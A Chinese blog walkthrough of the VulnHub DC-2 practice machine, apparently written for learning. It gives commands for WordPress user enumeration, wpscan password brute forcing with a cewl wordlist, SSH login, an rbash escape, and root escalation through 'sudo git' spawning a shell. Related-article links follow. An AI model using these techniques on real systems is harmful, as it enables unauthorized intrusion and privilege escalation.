Vulnhub靶机 DC-2渗透详细过程

VulnHub靶机 DC-2 打靶

目录

  • VulnHub靶机 DC-2 打靶
    • 一、将靶机导入到虚拟机当中
    • 二、攻击方式
      • 主机发现
      • 端口扫描
      • 服务探针
      • 爆破目录
      • web渗透
        • 信息收集
        • 扫描探针
        • 登录密码爆破
        • SSH远程登录
        • rbash
        • 提权

一、将靶机导入到虚拟机当中

靶机地址:

https://www.vulnhub.com/entry/dc-2,311/

image-20240413222236297

二、攻击方式

主机发现

使用arp-scan命令探测主机,或者使用nmap命令也可

image-20240413222052488

端口扫描

nmap -p- 10.1.2.154

image-20240413224851067

服务探针

image-20240413224919104

image-20240413225409159

开发80端口,访问一下web服务界面

爆破目录

dirsearch -u http://dc-2 -i 200

发现登录界面

image-20240413231739922

image-20240413231805112

web渗透

来到web界面首页得到flag提示信息

image-20240413225525231

翻译:

你通常的词汇表可能不会起作用,所以,也许你只需要保持冷静(cewl)。
密码越多越好,但有时候你就是赢不了所有密码。
以一个登录查看下一个标志。
如果找不到,请以另一个身份登录。
信息收集

发现此web服务的一些信息和采用的CMS

image-20240413225803367

发现网站采用WordPress CMS ,那么来到kali端使用wpscan工具进行对网站扫描

扫描探针
wpscan --url http://dc-2 -e u

得到三个登录用户,将其保存到记事本当中,跟前前面的flag提示,使用cewl命令针对网站来生成密码,并保存到记事本当中,后面进行爆破

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。

image-20240413230014363

使用cewl命令行工具,对网站进行生成字典,保存到passwd.txt当中

cewl http://dc-2 -w passwd.txt

image-20240413231205409

登录密码爆破

使用wpscan工具进行爆破

wpscan --url http://dc-3 -U user.txt -P passwd.txt 

image-20240413231314544

开始爆破,成功爆破出Jerry和tom的密码,等了web后台

image-20240413231352974

image-20240413231451256

用户名:tom
密码:parturient

用户名:jerry
密码:adipiscing

拿到用户名和密码登录网站后台,找到flag2

image-20240413233904659

image-20240413233848623

翻译:

如果您无法利用 WordPress 并走捷径,还有另一种方法。

希望你找到了另一个切入点。
SSH远程登录

这里没有什么利用点。开始的端口扫描,发现此将ssh端口改为7744,那么我们尝试将上面得到的用户名和密码再次进行SSH远程登录尝试

ssh tom@10.1.2.154 -p 7744
ssh jerry@10.1.2.154 -p 7744

发现tom可以远程登录成功,发现当前目录下有flag3.txt

没有cat命令,可以尝试其他可以产看文件的命令

image-20240413234231307

内容:

image-20240413234310700

翻译:

可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的压力承担责任。(su命令提示)
rbash

可看到出现su命令提示,我们尝试切换到Jerry用户,发现没有su ,我们需要rbash逃逸

image-20240413234527442

BASH_CMDS[su]=/bin/sh

su

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin/

su jerry
输入jerry的密码,前面收集爆破到的密码

image-20240414000250524

成功切换到jerry用户处,回到jerry的家目录,找到flag4.txt查看即可

image-20240414000403765

翻译:

很高兴看到你已经走了这么远-但你还没回家。你仍然需要得到最后的旗帜(唯一真正重要的旗帜!!!)这里没有提示-你现在是在你自己。:-)
走吧-离开这里!!!!(git)
提权

使用git提权即可

sudo git branch --help config
!/bin/sh

image-20240414000852688

well done!
恭喜你啊!!!

文章不妥之处,欢迎批评指正!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/545938.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

2024年,国产大模型的变革与突破

在今年两会上,“人工智能(AI)”成为热议焦点。政府工作报告不仅多次提及,还首次提出“人工智能”创新行动,彰显了对科技发展的深刻洞察和前瞻性布局。 回顾历年报告,从“互联网”到“智能”,每…

Transfomer代码实现与细节理解

文章目录 0. 简单理解1. 总体架构1.1 Encoder1.2 Decoder 2. 实现代码2.1 数据预处理2.2 模型参数2.2 Positional Encoding 位置编码2.3 Pad mask 填充的掩码2.4 Subsequence Mask 解码器的自注意力掩码2.6 Scaled Dot Product Attention2.7 MultiHead Attention2.8 FeedForwar…

使用IT-Tools+Cpolar在Windows搭建自己的IT工具箱并实现远程在线使用

文章目录 1. 使用Docker本地部署it-tools2. 本地访问it-tools3. 安装cpolar内网穿透4. 固定it-tools公网地址 本篇文章将介绍如何在Windows上使用Docker本地部署IT- Tools,并且同样可以结合cpolar实现公网访问。 在前一篇文章中我们讲解了如何在Linux中使用Docker搭…

异地组网怎么安装?

异地组网安装是指在不同地域的多个设备之间建立网络连接,以便实现数据传输和协同工作的过程。在如今的数字化时代,异地组网安装已经成为了许多企业和组织所必需的一项技术。 天联的使用场景 在异地组网安装中,天联是一种常用的工具。它具有以…

北京大学快手发布统一的图文视频生成大模型Video-LaVIT

随着多模态大语言模型(LLMs)的新发展,人们越来越关注如何将它们从图像-文本数据扩展到更具信息量的真实世界视频。与静态图像相比,视频为有效的大规模预训练带来了独特的挑战,因为需要对其时空动态进行建模。 针对视频…

vs配置opencv运行时“发生生成错误,是否继续并运行上次的成功生成”BUG解决办法

vs“发生生成错误,是否继续并运行上次的成功生成” 新手在用vs配置opencv时遇到这个错误时,容易无从下手解决。博主亲身经历很有可能是release/debug模式和配置文件不符的问题。 在配置【链接器】→【输入】→【附加依赖项】环节,编辑查看选择…

MySQL数据库max_allowed_packet参数

如上图所示的报错,我在提交接口的时候出现了这个错误: MySqlConnector.MySqlException:Error submitting 4MB packet;ensure max_allowed_packet is greater than 4MB.在MySQL数据库中,有一个参数叫max_allowed_packet,这个参数会…

013_NaN_in_Matlab中的非数与调试方法

Matlab中的非数与调试方法 是什么? Matlab编程(计算器使用)中经常有个错误给你,这句话里可能包含一个关键词NaN。大部分学生都有过被 NaN 支配的痛苦记忆。 NaN 是 Not a Number 的缩写,表示不是一个数字。在 Matla…

Apache Zeppelin 命令执行漏洞复现(CVE-2024-31861)

0x01 产品简介 Apache Zeppelin 是一个让交互式数据分析变得可行的基于网页的开源框架,Zeppelin提供了数据分析、数据可视化等功能, 0x02 漏洞概述 Apache Zeppelin 中代码生成控制不当(“代码注入”)漏洞。攻击者可以使用 She…

锁策略总结

锁策略 悲观锁和乐观锁 乐观锁和悲观锁不是具体类型的锁而是指两种不同的对待加锁的态度,这两个锁面对锁冲突的态度是相反的。 乐观锁:认为不存在很多的并发操作,因此不需要加锁。悲观锁:认为存在很多并发操作,因此需…

python实现简单的车道线检测

描述 python实现简单的车道线检测,本文章将介绍两种简单的方法 颜色阈值区域掩模canny边缘检测霍夫变换 这两种方法都能实现简单的车道线检测demo,注意仅仅是demo 下面的图片是用到的测试图片 方法1:颜色阈值(Color Selection…

jpa使用Querydsl需要规避的一些坑

在使用Spring Data JPA时,通常会使用Querydsl来构建类型安全的查询。在Querydsl中,为了区分实体类与Querydsl查询类,习惯上会给查询类的前缀添加一个"Q",表示该类是一个查询类。这样做可以有效地避免实体类与查询类之间…

并发学习28--多线程 Fork、Join线程池

概念 使用 import java.util.concurrent.ForkJoinPool; import java.util.concurrent.RecursiveTask;public class TC51 {public static void main(String[] args) {//递归到最小不可分解单元,再进行计算ForkJoinPool pool new ForkJoinPool(5);pool.invoke(new My…

「 典型安全漏洞系列 」14.NoSQL注入漏洞详解

NoSQL注入是一个漏洞,攻击者能够干扰应用程序对NoSQL数据库进行的查询,本文我们将研究如何测试一般的NoSQL漏洞,然后重点研究如何利用MongoDB中的漏洞(MongoDB是最流行的NoSQL数据库)。 1. 什么是NoSQL注入 NoSQL注入…

Langchain入门到实战-第二弹

Langchain入门到实战 Langchain快速入门官网地址Langchain概述Langchain调用大模型更新计划 Langchain快速入门 官网地址 声明: 由于操作系统, 版本更新等原因, 文章所列内容不一定100%复现, 还要以官方信息为准 https://python.langchain.com/Langchain概述 LangChain是一个…

thinkphp 框架封装curl请求

tp6 或者 tp8框架 在框架的app/common.php 文件里加一些方法就可以 app\common.php 在这个文件里加 以下代码 就可以实现基于 curl的请求方法 (记得要开启 php的curl扩展) 查看方法 cmd里输入 php -m if (!function_exists(get)) {/*** 发送get请求* param string $url 请求…

【御控物联】 Java JSON结构转换(2):对象To对象——属性重组

文章目录 一、JSON结构转换是什么?二、案例之《JSON对象 To JSON对象》三、代码实现四、在线转换工具五、技术资料 一、JSON结构转换是什么? JSON结构转换指的是将一个JSON对象或JSON数组按照一定规则进行重组、筛选、映射或转换,生成新的JS…

Stable Diffusion之文生图模型训练

1、数据准备 提前准备好一组相关的照片。 在线的图片处理网站 BIRME - Bulk Image Resizing Made Easy 2.0 (Online & Free) 将图片转成统一大小,支持批量处理,效率高 2、生成提示词 进入stable diffusion webui页面 旧版直接使用 train/proproc…

【服务器配置】ngnix环境配置

ngnix环境配置 概述 Nginx(发音为 “engine X”)是一个高性能的 HTTP 和反向代理服务器,也可用作邮件代理服务器。它以其稳定性、丰富的功能集、简单的配置和低资源消耗而闻名。Nginx 被广泛用于提高网站的可扩展性和性能,因为它…

Android使用shape属性绘制边框内渐变色

目录 先上效果图实现方法shape属性介绍代码结果 先上效果图 这是使用AndroidStudio绘制的带有渐变色的边框背景色 实现方法 项目中由于UI设计需求,需要给按钮、控件设置带有背景色效果的。以下是UI效果图。 这里我们使用shape属性来绘制背景效果。 shape属性介…